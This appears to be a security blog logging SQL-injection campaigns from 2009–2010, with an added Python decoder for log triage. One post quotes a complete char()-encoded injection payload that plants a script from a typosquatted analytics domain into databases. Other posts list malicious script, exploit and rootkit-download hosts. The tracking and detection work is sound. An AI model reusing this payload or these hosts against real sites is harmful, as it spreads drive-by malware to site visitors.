nutcountry.ru

Posted in sql injection on August 2, 2010 by s3cu

sql-injection of iframe links – http://nutcountry.ru:8080/index.php?pid=13

the domain is currently not resolvable.

google-analytiics.com

Posted in sql injection on January 15, 2010 by s3cu

Notice the two ‘i’s in the domain?

The sql-injection attack comes in the form:

set+variable=cast(variable+as+varchar(8000))%2Bcast(
char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))
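
For triaging requests like the one above in web-server logs, the following added example (not code from the original post) decodes the char() concatenation, drops the char(0) padding and extracts the host of any script or iframe tag it hides. The sample query is constructed in the same shape and uses the placeholder host example.invalid; the function names are this example's own.

```python
import re
from urllib.parse import unquote_plus, urlparse

# A run of four or more char(N) terms joined by "+" (sent as %2B in the URL).
# \b keeps "varchar(8000)" from being read as a char() term.
CHAR_RUN = re.compile(r"(?:\bchar\(\s*\d+\s*\)\s*\+?\s*){4,}", re.IGNORECASE)
CHAR_TERM = re.compile(r"\bchar\(\s*(\d+)\s*\)", re.IGNORECASE)
TAG_SRC = re.compile(r"<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)",
                     re.IGNORECASE)


def decode_char_runs(raw_query):
    """Decode every char() concatenation found in a URL-encoded query string."""
    query = unquote_plus(raw_query)  # "+" -> space, "%2B" -> "+"
    decoded = []
    for run in CHAR_RUN.finditer(query):
        codes = (int(n) for n in CHAR_TERM.findall(run.group(0)))
        # Drop the char(0) padding and anything outside the Unicode range.
        decoded.append("".join(chr(c) for c in codes if 0 < c < 0x110000))
    return decoded


def injected_hosts(raw_query):
    """Return the hosts referenced by script/iframe tags hidden in the query."""
    hosts = set()
    for text in decode_char_runs(raw_query):
        for src in TAG_SRC.findall(text):
            host = urlparse(src).hostname
            if host:
                hosts.add(host.lower())
    return sorted(hosts)


# Constructed sample in the shape shown above; example.invalid is a placeholder.
_TAG = '<script src="http://example.invalid/u.js"></script>'
_TERMS = ["char(%03d)" % b for b in _TAG.encode("ascii")] + ["char(0)"] * 5
SAMPLE_QUERY = ("set+variable=cast(variable+as+varchar(8000))%2Bcast("
                + "%2B".join(_TERMS) + "+as+varchar(8000))")

if __name__ == "__main__":
    print(decode_char_runs(SAMPLE_QUERY))
    print(injected_hosts(SAMPLE_QUERY))
```

The hosts it returns can be matched against a blocklist or searched for in stored database content to find rows that were already modified.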


z360.net/a.js

Posted in sql injection on September 2, 2009 by s3cu

this injected script also has several associated domains:

  • dd45h.8866.org/fkzd/16.htm
  • wm.1kfie.cn/x150/xx.html

One of the exploits downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]

k.18xn.com/x.js

Posted in sql injection on September 1, 2009 by s3cu

active sql-injection attack.

Injected scripts and exploits iframe to several urls such as:

the scripts generate some form of ‘time-based’ parameters that are probably only available for a brief period.

The trojan downloader from http://www.haerh.info gets a list of evil programs from http://www.gehae.info/2.txt

a0v.org/x.js

Posted in sql injection on July 23, 2009 by s3cu

another round of sql-injection attacks.

x.js calls iframe src http://www.jejsaj.com/ya/index.html

jejsaj contains various exploits targeting, among others:

  • owc 0-day
  • realplayer
  • msvidctl.dll

the exploits download trojans from http://www.wowand.com

f1y.in/j.js

Posted in sql injection on July 11, 2009 by s3cu

another round of sql-injection attempts

Update: beware of this malicious script as it is making use of OWC 0-day.
Ref – http://isc.sans.org/diary.html?storyid=6811

218.213.77.96/a.js

Posted in sql injection on May 28, 2009 by s3cu

a recent round of sql-injected links.